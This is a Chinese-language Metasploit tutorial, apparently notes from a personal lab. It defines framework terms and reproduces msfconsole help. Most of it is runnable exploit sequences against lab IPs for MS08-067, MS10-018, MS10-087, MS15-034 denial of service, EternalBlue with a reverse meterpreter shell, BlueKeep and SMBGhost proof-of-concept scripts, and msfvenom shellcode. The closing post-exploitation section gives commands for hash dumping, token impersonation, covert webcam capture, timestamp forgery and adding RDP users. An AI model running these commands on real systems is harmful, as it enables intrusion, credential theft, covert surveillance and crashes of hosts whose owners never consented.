MSF专业术语讲解
渗透攻击(Exploit)
渗透攻击是指由攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。
流行的攻击技术包括:缓冲区溢出、Web应用程序漏洞攻击,以及利用配置错误等。
攻击载荷(Payload)
攻击载何是我们期望目标系统在被渗透攻击后而执行的代码。在MSF框架中可以自由的选择、传送和植入。比如,反弹式shell是一种从目标主机到攻击主机创建网络连接,并提供命令行shell的攻击载荷。bind shell攻击载荷则在目标主机上将命令行shell绑定到一个打开的监听端口,攻击者可以连接这些端口来取得shell交互。
溢出代码(Shellcode)
shellcode是在渗透攻击时作为攻击载荷运行的一组机器指令。shellcode通常用汇编语言编写。在大多数情况下,目标系统执行了shellcode这一组指令后,才会提供一个命令行shell或者Meterpreter shell,这也是shellcode名称的由来。
模块(Module)
在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。在某些时候,你可能会使用一个渗透攻击模块(Exploit module),也就是用于实际发起渗透攻击的软件组件。而在其它时候,则可能使用一个辅助模块(auxiliary module),用来扫描一些诸如扫描或系统查点的攻击动作。
监听器(Listener)
监听器是MSF中用来等待连入网络连接的组件。举例来说,在目标主机被渗透攻击之后,它可能会通过互联网回连到攻击主机上,而监听器组件在攻击主机上等待被渗透攻击的系统来连接,并负责处理这些网络连接。
msfconsole相关命令
msf6 > ? Core Commands ============= Command Description ------- ----------- ? Help menu banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host debug Display information useful for debugging exit Exit the console get Gets the value of a context-specific variable getg Gets the value of a global variable grep Grep the output of another command help Help menu history Show command history load Load a framework plugin quit Exit the console repeat Repeat a list of commands route Route traffic through a session save Saves the active datastores sessions Dump session listings and display information about sessions set Sets a context-specific variable to a value setg Sets a global variable to a value sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads View and manipulate background threads tips Show a list of useful productivity tips unload Unload a framework plugin unset Unsets one or more context-specific variables unsetg Unsets one or more global variables version Show the framework and console library version numbers Module Commands =============== Command Description ------- ----------- advanced Displays advanced options for one or more modules back Move back from the current context clearm Clear the module stack info Displays information about one or more modules listm List the module stack loadpath Searches for and loads modules from a path options Displays global options or for one or more modules popm Pops the latest module off the stack and makes it active previous Sets the previously loaded module as the current module pushm Pushes the active or list of modules onto the module stack reload_all Reloads all modules from all defined module paths search Searches module names and descriptions show Displays modules of a given type, or all modules use Interact with a module by name or search term/index Job Commands ============ Command Description ------- ----------- handler Start a payload handler as job jobs Displays and manages jobs kill Kill a job rename_job Rename a job Resource Script Commands ======================== Command Description ------- ----------- makerc Save commands entered since start to a file resource Run the commands stored in a file Database Backend Commands ========================= Command Description ------- ----------- analyze Analyze database information about a specific address or address range db_connect Connect to an existing data service db_disconnect Disconnect from the current data service db_export Export a file containing the contents of the database db_import Import a scan result file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_rebuild_cache Rebuilds the database-stored module cache (deprecated) db_remove Remove the saved data service entry db_save Save the current data service connection as the default to reconnect on startup db_status Show the current data service status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspaces Credentials Backend Commands ============================ Command Description ------- ----------- creds List all credentials in the database Developer Commands ================== Command Description ------- ----------- edit Edit the current module or a file with the preferred editor irb Open an interactive Ruby shell in the current context log Display framework.log paged to the end if possible pry Open the Pry debugger on the current module or Framework reload_lib Reload Ruby library files from specified paths msfconsole ========== `msfconsole` is the primary interface to Metasploit Framework. There is quite a lot that needs go here, please be patient and keep an eye on this space! Building ranges and lists ------------------------- Many commands and options that take a list of things can use ranges to avoid having to manually list each desired thing. All ranges are inclusive. ### Ranges of IDs Commands that take a list of IDs can use ranges to help. Individual IDs must be separated by a `,` (no space allowed) and ranges can be expressed with either `-` or `..`. ### Ranges of IPs There are several ways to specify ranges of IP addresses that can be mixed together. The first way is a list of IPs separated by just a ` ` (ASCII space), with an optional `,`. The next way is two complete IP addresses in the form of `BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR specifications may also be used, however the whole address must be given to Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC. Additionally, a netmask can be used in conjunction with a domain name to dynamically resolve which block to target. All these methods work for both IPv4 and IPv6 addresses. IPv4 addresses can also be specified with special octet ranges from the [NMAP target specification](https://nmap.org/book/man-target-specification.html) ### Examples Terminate the first sessions: sessions -k 1 Stop some extra running jobs: jobs -k 2-6,7,8,11..15 Check a set of IP addresses: check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255 Target a set of IPv6 hosts: set RHOSTS fe80::3990:0000/110, ::1-::f0f0 Target a block from a resolved domain name: set RHOSTS www.example.test/24 search 搜索模块 use 使用模块 back 返回 connect 连接 exit 退出 info 查看模块具体信息 irb 进入rib脚本模式 jobs 显示和管理作业 kill 杀死进程 loadpath 加载一个模块的路径 quit 退出MSF load 加载一个插件 resource 运行储存一个文件中的命令 route 查看一个会话的路由信息 save 保存动作 set 给一个变量赋值 show option 显示模块用法 setg 把一个赋值给全局变量,例如上述set设置的IP,就会用到其他攻击模块的RHOST中。 sleep 在限定的秒数内什么也不做 unload 卸载一个模块 unset 解出一个或多个变量 unsetg 解出一个或多个全局变量 version 显示MSF和控制台库版本
Exploits模块
命名规则:系统/服务/名称 例如:windows/smb/ms08_067_netapi RHOST:目标主机IP地址 RPORT:目标主机连接端口 Payload:有效的载荷,成功后返回shell LHOST:攻击者的IP地址 LPORT:攻击者的端口
Payloads模块
是在使用一个模块之后再去使用的 命名规则:系统/类型/名称 例如:Windows/dllinject/reverse_tcp 类型命名规则 shell:上传一个shell dllinject:注入一个dll到进程 patchup***:修补漏洞 upexec:上传并执行一个文件 meterpreter:高级的payload vncinject:高级的payload passive:高级的payload 名称的命名规则 shell_find_tag:在一个已建立的连接上创建一个shell shell_reverse_tcp:反向连接到攻击者主机并创建一个shell bind_tcp:监听一个tcp连接 reverse_tcp:反向建立tcp连接 reverse_http:通过HTTP隧道通信并创建一个新用户添加到管理组 add_user:创建一个新用户并添加到管理组 xxx_ipv6_tcp:基于IPV6 xxx_nonx_tcp:no execute或win7(NX是应用在CPU的一种可以防止缓冲区溢出的技术)。 xxx_ord_tcp:有序payload xxx_tcp_allports:在所有可能的端口
MSF漏洞实例测试
网络服务器攻击渗透(MS08-067)
search ms08_067 use exploit/windows/smb/ms08_067_netapi set rhosts 10.4.7.50 set payload generic/shell_bind_tcp exploit
弹出提示 大概率版本问题 windows server 2003 网上的复现教程为xp
浏览器攻击渗透(MS10-018)
search ms10-018 use exploit/windows/browser/ms10_018_ie_behaviors set srvhost 10.4.7.20 set payload windows/meterpreter/bind_tcp exploit
应用软件格式渗透,利用word去渗透(MS10-087)
打开文档 让它弹出计算器
search MS10-087 use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof show options set filename ceshi.rtf set payload windows/exec set cmd calc.exe exploit
CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)
读取内存数据
search ms15-034 use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhost 10.4.7.50
蓝屏攻击
use auxiliary/dos/http/ms15_034_ulonglongadd set rhosts 10.4.7.22 set threads 10 run
这个win7 不给我面子 。。。
永恒之蓝(MS17-010)
search ms17-010 use exploit/windows/smb/ms17_010_eternalblue set rhost 10.4.7.22 set payload windows/x64/meterpreter/reverse_tcp set lost 10.4.7.20 set lport 4444 exploit
远程3389(CVE-2019-0708)与MS12-020
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set rhosts 10.4.7.22 set rport 3389 run
apt-get install python3-pip pip3 install impacket git clone https://github.com/n1xbyte/CVE-2019-0708.git cd CVE-2019-0708 python3 crashpoc.py 10.4.7.22 64
永恒之黑 (CVE-2020-0796)
蓝屏攻击
git clone https://github.com/ollypwn/SMBGhost.git cd SMBGhost/ python3 scanner.py 10.4.7.30 Traceback (most recent call last): File "scanner.py", line 4, in <module> from netaddr import IPNetwork ModuleNotFoundError: No module named 'netaddr'
pip3 install netaddr
git clone https://github.com/eerykitty/CVE-2020-0796-PoC cd CVE-2020-0796-PoC/ python3 CVE-2020-0796.py 10.4.7.30
getshell
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)
use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set lport 8888 //监听端口 set rhost 10.4.7.30 //目标主机 run
SMB版本扫描
use auxiliary/scanner/smb/smb_version
SSH版本扫描
use auxiliary/scanner/ssh/ssh_version
TFP版本扫描
use auxiliary/scanner/ftp/ftp_version
后渗透测试
上传文件到Windows主机 upload <file> <destination> upload //root//123.exe c:\\123.exe 下载 download file path 执行exe execute 123.exe 创建cmd通道 execute -f cmd -c 显示进程 ps 获取dos窗口 shell 提权 getsystem 获取hash hashdump 使用Credcollect转储hash值 run credcollect 创建端口转发 portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口 删除端口转发 portfwd delete -l <portnumber> -p <portnumber> -r <Target IP> 在目标主机上搜索文件 search -f *.txt 查看当前用户 getuid 获取主机信息 sysinfo 模拟任意用户(token操作) use incognito list_tokens -u impersonate_token “Machine\\user” webcam_list #查看摄像头 webcam_snap #通过摄像头拍照 webcam_stream #通过摄像头开启视屏 timestomp伪造时间戳 timestomp C:// -h #查看帮助 timestomp -v C://2.txt #查看时间戳 timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt enable_rdp脚本开启3389 run post/windows/manage/enable_rdp #开启远程桌面 run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户 run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662
详细讲解见: https://xz.aliyun.com/t/2536
